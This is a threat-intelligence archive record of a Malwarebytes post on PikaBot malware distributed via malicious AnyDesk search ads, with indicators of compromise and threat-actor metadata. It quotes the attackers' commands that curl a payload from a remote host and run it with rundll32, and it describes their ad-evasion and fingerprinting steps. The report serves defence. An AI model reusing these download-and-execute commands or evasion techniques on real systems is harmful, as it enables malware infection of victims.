{
	"id": "b96c08a2-5b9e-486e-8916-3f3ddc996353",
	"created_at": "2026-04-06T00:13:13.315563Z",
	"updated_at": "2026-04-10T13:13:07.266534Z",
	"deleted_at": null,
	"sha1_hash": "9f2256628e764e7c9dd3f848521a33183e951b07",
	"title": "PikaBot distributed via malicious search ads",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 469541,
	"plain_text": "PikaBot distributed via malicious search ads\r\nBy Jerome Segura\r\nPublished: 2023-12-15 · Archived: 2026-04-05 20:33:08 UTC\r\nPikaBot, a stealthy malware normally distributed via malspam, is now being spread via malicious ads.\r\nDuring this past year, we have seen an increase in the use of malicious ads (malvertising), and specifically those\r\nvia search engines, to drop malware targeting businesses. In fact, browser-based attacks overall have been a lot\r\nmore common if we include social engineering campaigns.\r\nCriminals have found success in acquiring new victims thanks to search ads; we believe there are specialized\r\nservices that help malware distributors and affiliates bypass Google’s security measures and set up a decoy\r\ninfrastructure. In particular, we saw similarities with the malvertising chains previously used to drop\r\nFakeBat.\r\nIn the past few days, researchers including ourselves have observed PikaBot, a new malware family that appeared\r\nin early 2023, distributed via malvertising. PikaBot was previously only distributed via malspam campaigns,\r\nsimilarly to QakBot, and emerged as one of the preferred payloads for a threat actor known as TA577.\r\nIn this blog post, we share details about this new campaign along with indicators of compromise.\r\nPikaBot via malspam\r\nPikaBot was first identified as a possible Matanbuchus drop from a malspam campaign by Unit 42 in February\r\n2023. The name PikaBot was later given and attributed to TA577, a threat actor that Proofpoint saw involved in\r\nthe distribution of payloads such as QakBot, IcedID, SystemBC as well as Cobalt Strike. More importantly,\r\nTA577 has been associated with ransomware distribution.\r\nResearchers at Cofense observed a rise in malspam campaigns to deliver both DarkGate and PikaBot, following\r\nthe takedown of the QakBot botnet in August 2023. A typical distribution chain for PikaBot usually starts with an\r\nemail (hijacked thread) containing a link to an external website. Users are tricked into downloading a zip archive\r\ncontaining a malicious JavaScript.\r\nhttps://www.malwarebytes.com/blog/threat-intelligence/2023/12/pikabot-distributed-via-malicious-ads\r\nPage 1 of 8\n\nThe JavaScript creates a random directory structure where it retrieves the malicious payload from an external\r\nwebsite via the curl utility:\r\n\"C:\\Windows\\System32\\cmd.exe\" /c mkdir C:\\Gkooegsglitrg\\Dkrogirbksri \u0026 curl https://keebling[.]com/Y0\r\ncurl https://keebling[.]com/Y0j85XT/0.03471530983348692.dat --output C:\\Gkooegsglitrg\\Dkrogirbksri\\Wk\r\nIt then executes the payload (DLL) via rundll32:\r\nrundll32 C:\\Gkooegsglitrg\\Dkrogirbksri\\Wkkfgujbsrbuj.dll,Enter\r\nAs described by OALabs, PikaBot’s core module is then injected into the legitimate SearchProtocolHost.exe\r\nprocess. PikaBot’s loader also hides its injection by using indirect syscalls, making the malware very stealthy.\r\nDistribution via malvertising\r\nThe campaign targets Google searches for the remote access application AnyDesk. Security researcher Colin Cowie\r\nobserved the distribution chain, and the payload was later confirmed to be PikaBot by Ole Villadsen.\r\nWe also saw this campaign via a different ad impersonating the AnyDesk brand, belonging to the fake persona\r\n“Manca Marina”:\r\nA decoy website has been set up at anadesky[.]ovmv[.]net:\r\nThe download is a digitally signed MSI installer. It’s worth noting that it had zero detection on VirusTotal at the\r\ntime we collected it. However, the more interesting aspect is how it evades detection upon execution.\r\nThe diagram below from JoeSandbox summarizes the execution flow:\r\nMalvertising similarities with FakeBat\r\nThe threat actors are bypassing Google’s security checks with a tracking URL via a legitimate marketing platform\r\nto redirect to their custom domain behind Cloudflare. At this point, only clean IP addresses are forwarded to the\r\nnext step.\r\nThey perform fingerprinting via JavaScript to determine, among other things, if the user is running a virtual\r\nmachine. Only after the check is successful do we see a redirect to the main landing page (decoy AnyDesk site).\r\nWhat’s interesting is that there is a second fingerprinting attempt when the user clicks the download button. This\r\nis likely to ensure that the download link won’t work in a virtualized environment. In this particular campaign, the\r\nthreat actor is hosting the MSI installer on Dropbox.\r\nWe noticed that previous malvertising chains used the same redirection mechanism via onelink[.]me as well as the same\r\nURL structure. These incidents were previously reported to Google and targeted Zoom and Slack search ads:\r\nIn some of these instances, we had identified the payload as FakeBat. This is particularly interesting because it\r\npoints towards a common process used by different threat actors. Perhaps this is something akin to “malvertising\r\nas a service”, where Google ads and decoy pages are provided to malware distributors.\r\nConclusion\r\nSeveral years ago, exploit kits were the primary malware distribution vector via drive-by downloads. As\r\nexploiting vulnerabilities in the browser and its plugins became less effective, threat actors concentrated on spam to\r\ntarget businesses. However, some did continue to target browsers but instead had to rely on social engineering,\r\nluring victims with fake browser updates.\r\nWith malvertising, we see another powerful delivery vector that does not require the user to visit a compromised\r\nsite. Instead, threat actors are piggybacking on search engines and simply buying ads that they know their target\r\nwill be exposed to. As we may have said before, businesses can prevent this risk by only allowing their end users\r\nto install applications via their own trusted repositories.\r\nMalwarebytes detects the malicious MSI installers as well as the web infrastructure used in these malvertising\r\ncampaigns. We have reported the malicious ads and download URLs to Google and Dropbox respectively.\r\nSpecial thanks to Sergei Frankoff, Ole Villadsen, and pr0xylife for their help and feedback.\r\nIndicators of Compromise\r\nMalicious domains\r\nanadesky[.]ovmv[.]net\r\ncxtensones[.]top\r\nDropbox payloads\r\ndropbox[.]com/scl/fi/3o9baztz08bdw6yts8sft/Installer.msi?dl=1\u0026rlkey=wpbj6u5u6tja92y1t157z4cpq\r\ndropbox[.]com/scl/fi/p8iup71lu1tiwsyxr909l/Installer.msi?dl=1\u0026rlkey=h07ehkq617rxphb3asmd91xtu\r\ndropbox[.]com/scl/fi/tzq52v1t9lyqq1nys3evj/InstallerKS.msi?dl=1\u0026rlkey=qbtes3fd3v3vtlzuz8ql9t3qj\r\nPikaBot hashes\r\n0e81a36141d196401c46f6ce293a370e8f21c5e074db5442ff2ba6f223c435f5\r\nda81259f341b83842bf52325a22db28af0bc752e703a93f1027fa8d38d3495ff\r\n69281eea10f5bfcfd8bc0481f0da9e648d1bd4d519fe57da82f2a9a452d60320\r\nPikaBot C2s\r\n172[.]232[.]186[.]251\r\n57[.]128[.]83[.]129\r\n57[.]128[.]164[.]11\r\n57[.]128[.]108[.]132\r\n139[.]99[.]222[.]29\r\n172[.]232[.]164[.]77\r\n54[.]37[.]79[.]82\r\n172[.]232[.]162[.]198\r\n57[.]128[.]109[.]221\r\nSource: https://www.malwarebytes.com/blog/threat-intelligence/2023/12/pikabot-distributed-via-malicious-ads",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.malwarebytes.com/blog/threat-intelligence/2023/12/pikabot-distributed-via-malicious-ads"
	],
	"report_names": [
		"pikabot-distributed-via-malicious-ads"
	],
	"threat_actors": [
		{
			"id": "d9b39228-0d9d-4c1e-8e39-2de986120060",
			"created_at": "2023-01-06T13:46:39.293127Z",
			"updated_at": "2026-04-10T02:00:03.277123Z",
			"deleted_at": null,
			"main_name": "BelialDemon",
			"aliases": [
				"Matanbuchus"
			],
			"source_name": "MISPGALAXY:BelialDemon",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b4f83fef-38ee-4228-9d27-dde8afece1cb",
			"created_at": "2023-02-15T02:01:49.569611Z",
			"updated_at": "2026-04-10T02:00:03.351659Z",
			"deleted_at": null,
			"main_name": "TA577",
			"aliases": [
				"Hive0118"
			],
			"source_name": "MISPGALAXY:TA577",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "22d450bb-fc7a-42af-9430-08887f0abf9f",
			"created_at": "2024-11-01T02:00:52.560354Z",
			"updated_at": "2026-04-10T02:00:05.276856Z",
			"deleted_at": null,
			"main_name": "TA577",
			"aliases": [
				"TA577"
			],
			"source_name": "MITRE:TA577",
			"tools": [
				"Pikabot",
				"QakBot",
				"Latrodectus"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434393,
	"ts_updated_at": 1775826787,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9f2256628e764e7c9dd3f848521a33183e951b07.pdf",
		"text": "https://archive.orkl.eu/9f2256628e764e7c9dd3f848521a33183e951b07.txt",
		"img": "https://archive.orkl.eu/9f2256628e764e7c9dd3f848521a33183e951b07.jpg"
	}
}